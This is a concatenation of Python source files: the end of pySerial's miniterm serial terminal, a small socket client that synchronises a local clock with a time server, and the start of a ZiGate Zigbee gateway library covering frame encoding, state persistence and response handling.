self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script,
# e.g. to create a miniterm-my-device.py
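# For instance (illustrative sketch, assuming the usual pySerial layout where
# this module is importable as serial.tools.miniterm), such a wrapper could be:
#
#     from serial.tools.miniterm import main
#
#     if __name__ == '__main__':
#         main(default_port='/dev/ttyUSB0', default_baudrate=115200)
#
# The port name and baud rate shown are placeholders, not pySerial defaults.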
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
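# Usage sketch (assumption: the port and baud rate are the positional arguments
# defined earlier in this file, and 'default' is one of the registered
# TRANSFORMATIONS). A typical invocation might look like:
#
#   python miniterm.py /dev/ttyUSB0 115200 -e --eol LF --filter default
#
# where -e enables local echo, --eol LF sends bare line feeds and --filter
# applies the named text transformation.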
|
client2.py
|
import socket
import datetime
import threading
import pytz
import time
from lib.MyUtils import TimeBuilder, ClientIncrementBuilder, get_time_server_delay
def set_time_from_server(raw_timestamp):
datetime_updated = TimeBuilder(
datetime.datetime.fromtimestamp(raw_timestamp))
if datetime_updated.get_time() < datetime_actual.get_time():
offset = datetime_actual.get_time() - datetime_updated.get_time()
print(offset * 2)
client_increment.set_values(True, 2, offset * 2, datetime.timedelta())
elif datetime_updated.get_time() > datetime_actual.get_time():
datetime_actual.time = datetime_updated.get_time()
print("[Server]: Updated time.")
def timer():
while True:
if client_increment.client_so_fast:
print("Client so fast")
if client_increment.added_offset < client_increment.client_increment_time:
client_increment.add_offsed_added(datetime.timedelta(seconds=1))
datetime_actual.add(datetime.timedelta(seconds=1))
time.sleep(client_increment.client_increment)
else:
client_increment.set_values(False, 1, 0, datetime.timedelta())
else:
datetime_actual.add(datetime.timedelta(seconds=1))
time.sleep(client_increment.client_increment)
def listen_handler(conn, address):
raw_data = conn.recv(1024)
print("New message from ", address, " : ", raw_data)
set_time_from_server(float(raw_data.decode()))
def my_listener(socket_instance):
print("Started client listener")
group_data = socket_instance.getsockname()
listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener_socket.bind((group_data[0], group_data[1]))
listener_socket.listen(10)
while True:
conn, address = listener_socket.accept()
temp_thread = threading.Thread(target=listen_handler, args=(conn, address,))
temp_thread.start()
if __name__ == "__main__":
    # Client whose clock is set 5 minutes behind real time
    print("Client running 5 minutes behind real time..")
datetime_actual = None
datetime_updated = None
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.connect(("localhost", 9999))
print(socket_instance.getsockname())
listen_thread = threading.Thread(target=my_listener, args=(socket_instance,))
listen_thread.start()
datetime_actual = TimeBuilder(datetime.datetime.now() - datetime.timedelta(minutes=5))
socket_instance.send(("my_time|" + str(datetime_actual.get_timestamp())).encode())
result = socket_instance.recv(1024)
print(result)
client_increment = ClientIncrementBuilder()
socket_instance.close()
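# Minimal sketch (assumption): lib.MyUtils is not included here, but from the
# calls above its helpers would look roughly like this:
#
#   class TimeBuilder:
#       def __init__(self, dt): self.time = dt
#       def get_time(self): return self.time
#       def get_timestamp(self): return self.time.timestamp()
#       def add(self, delta): self.time += delta
#
#   class ClientIncrementBuilder:
#       def __init__(self):
#           self.set_values(False, 1, 0, datetime.timedelta())
#       def set_values(self, so_fast, increment, increment_time, added_offset):
#           self.client_so_fast = so_fast                 # clock ahead of server?
#           self.client_increment = increment             # seconds between ticks
#           self.client_increment_time = increment_time   # offset left to absorb
#           self.added_offset = added_offset              # offset absorbed so far
#       def add_offsed_added(self, delta):
#           self.added_offset += delta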
|
core.py
|
#! /usr/bin/python3
#
# Copyright (c) 2018 Sébastien RAMAGE
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from binascii import hexlify
import traceback
from time import (sleep, strftime, time)
import logging
import json
import os
from shutil import copyfile
from pydispatch import dispatcher
from .transport import (ThreadSerialConnection,
ThreadSocketConnection,
FakeTransport)
from .responses import (RESPONSES, Response)
from .const import (ACTIONS_COLOR, ACTIONS_LEVEL, ACTIONS_LOCK, ACTIONS_HUE,
ACTIONS_ONOFF, ACTIONS_TEMPERATURE, ACTIONS_COVER,
ACTIONS_THERMOSTAT,
OFF, ON, TYPE_COORDINATOR, STATUS_CODES,
ZIGATE_ATTRIBUTE_ADDED, ZIGATE_ATTRIBUTE_UPDATED,
ZIGATE_DEVICE_ADDED, ZIGATE_DEVICE_REMOVED,
ZIGATE_DEVICE_UPDATED, ZIGATE_DEVICE_ADDRESS_CHANGED,
ZIGATE_PACKET_RECEIVED, ZIGATE_DEVICE_NEED_DISCOVERY,
ZIGATE_RESPONSE_RECEIVED, DATA_TYPE, BASE_PATH)
from .clusters import (Cluster, get_cluster)
import functools
import struct
import threading
import random
from enum import Enum
import colorsys
import datetime
try:
import RPi.GPIO as GPIO
except Exception:
# Fake GPIO
class GPIO:
def fake(self, *args, **kwargs):
LOGGER.error('GPIO Not available')
def __getattr__(self, *args, **kwargs):
return self.fake
GPIO = GPIO()
LOGGER = logging.getLogger('zigate')
AUTO_SAVE = 5 * 60 # 5 minutes
BIND_REPORT = True # automatically bind and report state for light
SLEEP_INTERVAL = 0.1
ACTIONS = {}
WAIT_TIMEOUT = 3
# Device id
ACTUATORS = [0x0010, 0x0051,
0x010a, 0x010b, 0x010c, 0x010d,
0x0100, 0x0101, 0x0102, 0x0103, 0x0105, 0x0110,
0x0200, 0x0202, 0x0210, 0x0220,
0x0301]
# On/off light 0x0000
# On/off plug-in unit 0x0010
# Dimmable light 0x0100
# Dimmable plug-in unit 0x0110
# Color light 0x0200
# Extended color light 0x0210
# Color temperature light 0x0220
# On/Off Light 0x0100 Section 3.1
# Dimmable Light 0x0101 Section 3.2
# Colour Dimmable Light 0x0102 Section 3.3
# On/Off Light Switch 0x0103 Section 3.4
# Dimmer Switch 0x0104 Section 3.5
# Colour Dimmer Switch 0x0105 Section 3.6
# Light Sensor 0x0106 Section 3.7
# Occupancy Sensor 0x0107 Section 3.8
# On/Off Ballast 0x0108 Section 3.9
# Dimmable Ballast 0x0109 Section 3.10
# On/Off Plug-in Unit 0x010A Section 3.11
# Dimmable Plug-in Unit 0x010B Section 3.12
# Colour Temperature Light 0x010C Section 3.13
# Extended Colour Light 0x010D Section 3.14
# Light Level Sensor 0x010E Section 3.15
# Colour Controller 0x0800 Section 3.16
# Colour Scene Controller 0x0810 Section 3.17
# Non-Colour Controller 0x0820 Section 3.18
# Non-Colour Scene Controller 0x0830 Section 3.19
# Control Bridge 0x0840 Section 3.20
# On/Off Sensor 0x0850 Section 3.21
def register_actions(action):
def decorator(func):
if action not in ACTIONS:
ACTIONS[action] = []
ACTIONS[action].append(func.__name__)
return func
return decorator
class AddrMode(Enum):
bound = 0
group = 1
short = 2
ieee = 3
def hex_to_rgb(h):
''' convert hex color to rgb tuple '''
h = h.strip('#')
return tuple(int(h[i:i + 2], 16) / 255 for i in (0, 2, 4))
def rgb_to_xy(rgb):
''' convert rgb tuple to xy tuple '''
red, green, blue = rgb
r = ((red + 0.055) / (1.0 + 0.055))**2.4 if (red > 0.04045) else (red / 12.92)
g = ((green + 0.055) / (1.0 + 0.055))**2.4 if (green > 0.04045) else (green / 12.92)
b = ((blue + 0.055) / (1.0 + 0.055))**2.4 if (blue > 0.04045) else (blue / 12.92)
X = r * 0.664511 + g * 0.154324 + b * 0.162028
Y = r * 0.283881 + g * 0.668433 + b * 0.047685
Z = r * 0.000088 + g * 0.072310 + b * 0.986039
cx = 0
cy = 0
if (X + Y + Z) != 0:
cx = X / (X + Y + Z)
cy = Y / (X + Y + Z)
return (cx, cy)
def hex_to_xy(h):
''' convert hex color to xy tuple '''
return rgb_to_xy(hex_to_rgb(h))
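# Worked example (sketch): pure red '#ff0000' linearizes to (1.0, 0.0, 0.0) with
# the sRGB curve above, so hex_to_xy('#ff0000') maps to roughly
# (x, y) ≈ (0.70, 0.30) using the matrix coefficients in rgb_to_xy.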
def dispatch_signal(signal=dispatcher.Any, sender=dispatcher.Anonymous,
*arguments, **named):
'''
Dispatch signal with exception proof
'''
LOGGER.debug('Dispatch %s', signal)
try:
dispatcher.send(signal, sender, *arguments, **named)
except Exception:
LOGGER.error('Exception dispatching signal %s', signal)
LOGGER.error(traceback.format_exc())
class ZiGate(object):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._devices = {}
self._groups = {}
self._scenes = {}
self._neighbours_table_cache = []
self._path = path
self._version = None
self._port = port
self._last_response = {} # response to last command type
self._last_status = {} # status to last command type
self._save_lock = threading.Lock()
self._autosavetimer = None
self._closing = False
self.connection = None
self._addr = '0000'
self._ieee = None
self.panid = 0
self.extended_panid = 0
self.channel = 0
self._started = False
self._no_response_count = 0
# self._event_thread = threading.Thread(target=self._event_loop,
# name='ZiGate-Event Loop')
# self._event_thread.setDaemon(True)
# self._event_thread.start()
self._ota_reset_local_variables()
if adminpanel:
self.start_adminpanel()
if auto_start:
self.startup(channel)
if auto_save:
self.start_auto_save()
@property
def ieee(self):
return self._ieee
@property
def addr(self):
return self._addr
def start_adminpanel(self):
'''
Start Admin panel in other thread
'''
from .adminpanel import start_adminpanel
start_adminpanel(self)
def _event_loop(self):
while not self._closing:
if self.connection and not self.connection.received.empty():
packet = self.connection.received.get()
dispatch_signal(ZIGATE_PACKET_RECEIVED, self, packet=packet)
t = threading.Thread(target=self.decode_data, args=(packet,),
name='ZiGate-Decode data')
t.setDaemon(True)
t.start()
# self.decode_data(packet)
else:
sleep(SLEEP_INTERVAL)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port)
def close(self):
self._closing = True
if self._autosavetimer:
self._autosavetimer.cancel()
try:
if self.connection:
self.connection.close()
except Exception:
LOGGER.error('Exception during closing')
LOGGER.error(traceback.format_exc())
self.connection = None
self._started = False
def save_state(self, path=None):
LOGGER.debug('Saving persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
if self._autosavetimer:
self._autosavetimer.cancel()
return
self._path = os.path.expanduser(path)
backup_path = self._path + '.0'
LOGGER.debug('Acquire Lock to save persistent file')
r = self._save_lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock to save persistent file')
return
try:
if os.path.exists(self._path):
                LOGGER.debug('File already exists, making a backup first')
copyfile(self._path, backup_path)
except Exception:
LOGGER.error('Failed to create backup, cancel saving.')
LOGGER.error(traceback.format_exc())
LOGGER.debug('Release Lock of persistent file')
self._save_lock.release()
return
try:
data = {'devices': list(self._devices.values()),
'groups': self._groups,
'scenes': self._scenes,
'neighbours_table': self._neighbours_table_cache
}
with open(self._path, 'w') as fp:
json.dump(data, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
except Exception:
LOGGER.error('Failed to save persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.error('Restoring backup...')
copyfile(backup_path, self._path)
LOGGER.debug('Release Lock of persistent file')
self._save_lock.release()
def load_state(self, path=None):
LOGGER.debug('Try loading persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
return
self._path = os.path.expanduser(path)
backup_path = self._path + '.0'
files = [self._path, backup_path]
for f in files:
LOGGER.debug('Trying to load %s', f)
if not os.path.exists(f):
LOGGER.warning('Persistent file %s doesn\'t exist', f)
continue
try:
with open(f) as fp:
data = json.load(fp)
if not isinstance(data, dict): # old version
data = {'devices': data, 'groups': {}}
groups = data.get('groups', {})
for k, v in groups.items():
groups[k] = set([tuple(r) for r in v])
self._groups = groups
self._scenes = data.get('scenes', {})
self._neighbours_table_cache = data.get('neighbours_table', [])
devices = data.get('devices', [])
for data in devices:
try:
device = Device.from_json(data, self)
self._devices[device.addr] = device
device._create_actions()
except Exception:
LOGGER.error('Error loading device %s', data)
LOGGER.debug('Load success')
return True
except Exception:
LOGGER.error('Failed to load persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.debug('No file to load')
return False
def start_auto_save(self):
LOGGER.debug('Auto saving %s', self._path)
self.save_state()
self._autosavetimer = threading.Timer(AUTO_SAVE, self.start_auto_save)
self._autosavetimer.setDaemon(True)
self._autosavetimer.start()
def __del__(self):
self.close()
def _start_event_thread(self):
self._event_thread = threading.Thread(target=self._event_loop,
name='ZiGate-Event Loop')
self._event_thread.setDaemon(True)
self._event_thread.start()
def autoStart(self, channel=None):
self.startup(channel)
def startup(self, channel=None):
'''
Startup sequence:
- Load persistent file
- setup connection
- Set Channel mask
- Set Type Coordinator
- Start Network
- Refresh devices list
'''
if self._started:
return
self._closing = False
self._start_event_thread()
self.load_state()
self.setup_connection()
version = self.get_version()
self.set_channel(channel)
self.set_type(TYPE_COORDINATOR)
LOGGER.debug('Check network state')
# self.start_network()
network_state = self.get_network_state()
if not network_state:
LOGGER.error('Failed to get network state')
if not network_state or network_state.get('extended_panid') == 0 or \
network_state.get('addr') == 'ffff':
LOGGER.debug('Network is down, start it')
self.start_network(True)
if version and version['version'] >= '3.1a':
LOGGER.debug('Set Zigate normal mode (firmware >= 3.1a)')
self.set_raw_mode(False)
if version and version['version'] >= '3.0f':
LOGGER.debug('Set Zigate Time (firmware >= 3.0f)')
self.set_time()
self.get_devices_list(True)
t = threading.Thread(target=self.need_discovery)
t.setDaemon(True)
t.start()
# self.need_discovery()
def need_discovery(self):
'''
scan device which need discovery
auto discovery if possible
else dispatch signal
'''
for device in self.devices:
if device.need_discovery():
if device.receiver_on_when_idle():
LOGGER.debug('Auto discover device %s', device)
device.discover_device()
else:
dispatch_signal(ZIGATE_DEVICE_NEED_DISCOVERY,
self, **{'zigate': self,
'device': device})
def zigate_encode(self, data):
encoded = bytearray()
for b in data:
if b < 0x10:
encoded.extend([0x02, 0x10 ^ b])
else:
encoded.append(b)
return encoded
def zigate_decode(self, data):
flip = False
decoded = bytearray()
for b in data:
if flip:
flip = False
decoded.append(b ^ 0x10)
elif b == 0x02:
flip = True
else:
decoded.append(b)
return decoded
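    # Byte-stuffing roundtrip example for the two helpers above: any byte below
    # 0x10 is escaped as 0x02 followed by (byte ^ 0x10), so
    #   zigate_encode(b'\x01\x10')                -> bytearray(b'\x02\x11\x10')
    #   zigate_decode(bytearray(b'\x02\x11\x10')) -> bytearray(b'\x01\x10')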
def checksum(self, *args):
chcksum = 0
for arg in args:
if isinstance(arg, int):
chcksum ^= arg
continue
for x in arg:
chcksum ^= x
return chcksum
def send_to_transport(self, data):
if not self.connection.is_connected():
raise Exception('Not connected to zigate')
self.connection.send(data)
def send_data(self, cmd, data="", wait_response=None, wait_status=True):
'''
send data through ZiGate
'''
LOGGER.debug('REQUEST : 0x{:04x} {}'.format(cmd, data))
self._last_status[cmd] = None
if wait_response:
self._clear_response(wait_response)
if isinstance(cmd, int):
byte_cmd = struct.pack('!H', cmd)
        elif isinstance(cmd, str):
byte_cmd = bytes.fromhex(cmd)
else:
byte_cmd = cmd
if isinstance(data, str):
byte_data = bytes.fromhex(data)
else:
byte_data = data
assert type(byte_cmd) == bytes
assert type(byte_data) == bytes
length = len(byte_data)
byte_length = struct.pack('!H', length)
checksum = self.checksum(byte_cmd, byte_length, byte_data)
msg = struct.pack('!HHB%ds' % length, cmd, length, checksum, byte_data)
LOGGER.debug('Msg to send %s', hexlify(msg))
enc_msg = self.zigate_encode(msg)
enc_msg.insert(0, 0x01)
enc_msg.append(0x03)
encoded_output = bytes(enc_msg)
LOGGER.debug('Encoded Msg to send %s', hexlify(encoded_output))
self.send_to_transport(encoded_output)
if wait_status:
status = self._wait_status(cmd)
if wait_response and status is not None:
r = self._wait_response(wait_response)
return r
return status
return False
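    # Frame layout sketch, as assembled in send_data above:
    #   0x01 | stuffed( msg_type:u16 | length:u16 | checksum:u8 | payload ) | 0x03
    # where checksum is the XOR of every byte of msg_type, length and payload.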
def decode_data(self, packet):
'''
Decode raw packet message
'''
try:
decoded = self.zigate_decode(packet[1:-1])
msg_type, length, checksum, value, lqi = \
struct.unpack('!HHB%dsB' % (len(decoded) - 6), decoded)
except Exception:
LOGGER.error('Failed to decode packet : %s', hexlify(packet))
return
if length != len(value) + 1: # add lqi length
LOGGER.error('Bad length %s != %s : %s', length, len(value) + 1, value)
return
computed_checksum = self.checksum(decoded[:4], lqi, value)
if checksum != computed_checksum:
LOGGER.error('Bad checksum %s != %s', checksum, computed_checksum)
return
LOGGER.debug('Received response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
try:
response = RESPONSES.get(msg_type, Response)(value, lqi)
except Exception:
LOGGER.error('Error decoding response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
LOGGER.error(traceback.format_exc())
return
if msg_type != response.msg:
LOGGER.warning('Unknown response 0x{:04x}'.format(msg_type))
LOGGER.debug(response)
self._last_response[msg_type] = response
self.interpret_response(response)
dispatch_signal(ZIGATE_RESPONSE_RECEIVED, self, response=response)
def interpret_response(self, response):
if response.msg == 0x8000: # status
if response['status'] != 0:
LOGGER.error('Command 0x{:04x} failed {} : {}'.format(response['packet_type'],
response.status_text(),
response['error']))
self._last_status[response['packet_type']] = response
elif response.msg == 0x8007: # factory reset
if response['status'] == 0:
self._devices = {}
self.start_network()
elif response.msg == 0x8015: # device list
keys = set(self._devices.keys())
known_addr = set([d['addr'] for d in response['devices']])
LOGGER.debug('Known devices in zigate : %s', known_addr)
missing = keys.difference(known_addr)
LOGGER.debug('Previous devices missing : %s', missing)
for addr in missing:
self._tag_missing(addr)
# self._remove_device(addr)
for d in response['devices']:
if d['ieee'] == '0000000000000000':
continue
device = Device(dict(d), self)
self._set_device(device)
elif response.msg == 0x8042: # node descriptor
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
d.update_info(response.cleaned_data())
self.discover_device(addr)
elif response.msg == 0x8043: # simple descriptor
addr = response['addr']
endpoint = response['endpoint']
d = self.get_device_from_addr(addr)
if d:
ep = d.get_endpoint(endpoint)
ep.update(response.cleaned_data())
ep['in_clusters'] = response['in_clusters']
ep['out_clusters'] = response['out_clusters']
self.discover_device(addr)
d._create_actions()
elif response.msg == 0x8045: # endpoint list
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
for endpoint in response['endpoints']:
ep = d.get_endpoint(endpoint['endpoint'])
self.simple_descriptor_request(addr, endpoint['endpoint'])
self.discover_device(addr)
elif response.msg == 0x8048: # leave
device = self.get_device_from_ieee(response['ieee'])
if device:
if response['rejoin_status'] == 1:
device.missing = True
else:
self._remove_device(device.addr)
elif response.msg == 0x8062: # Get group membership response
data = response.cleaned_data()
self._sync_group_membership(data['addr'], data['endpoint'], data['groups'])
elif response.msg in (0x8100, 0x8102, 0x8110, 0x8401,
0x8085, 0x8095, 0x80A7): # attribute report or IAS Zone status change
if response.get('status', 0) != 0:
LOGGER.debug('Received Bad status')
# handle special case, no model identifier
if response['status'] == 0x86 and response['cluster'] == 0 and response['attribute'] == 5:
response['data'] = 'unsupported'
else:
return
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
device.lqi = response['lqi']
r = device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
if r is None:
return
added, attribute_id = r
changed = device.get_attribute(response['endpoint'],
response['cluster'],
attribute_id, True)
if response['cluster'] == 0 and attribute_id == 5:
if not device.discovery:
device.load_template()
if added:
dispatch_signal(ZIGATE_ATTRIBUTE_ADDED, self, **{'zigate': self,
'device': device,
'attribute': changed})
else:
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self, **{'zigate': self,
'device': device,
'attribute': changed})
elif response.msg == 0x004D: # device announce
LOGGER.debug('Device Announce %s', response)
device = Device(response.data, self)
self._set_device(device)
elif response.msg == 0x8140: # attribute discovery
if 'addr' in response:
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
r = device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
elif response.msg == 0x8501: # OTA image block request
LOGGER.debug('Client is requesting ota image data')
self._ota_send_image_data(response)
elif response.msg == 0x8503: # OTA Upgrade end request
LOGGER.debug('Client ended ota process')
self._ota_handle_upgrade_end_request(response)
elif response.msg == 0x8702: # APS Data confirm Fail
LOGGER.error(response)
# else:
# LOGGER.debug('Do nothing special for response {}'.format(response))
def _get_device(self, addr):
'''
get device from addr
create it if necessary
'''
d = self.get_device_from_addr(addr)
if not d:
LOGGER.warning('Device not found, create it (this isn\'t normal)')
d = Device({'addr': addr}, self)
self._set_device(d)
self.get_devices_list() # since device is missing, request info
return d
def _tag_missing(self, addr):
'''
tag a device as missing
'''
last_24h = datetime.datetime.now() - datetime.timedelta(hours=24)
last_24h = last_24h.strftime('%Y-%m-%d %H:%M:%S')
if addr in self._devices:
if self._devices[addr].last_seen and self._devices[addr].last_seen < last_24h:
self._devices[addr].missing = True
LOGGER.warning('The device %s is missing', addr)
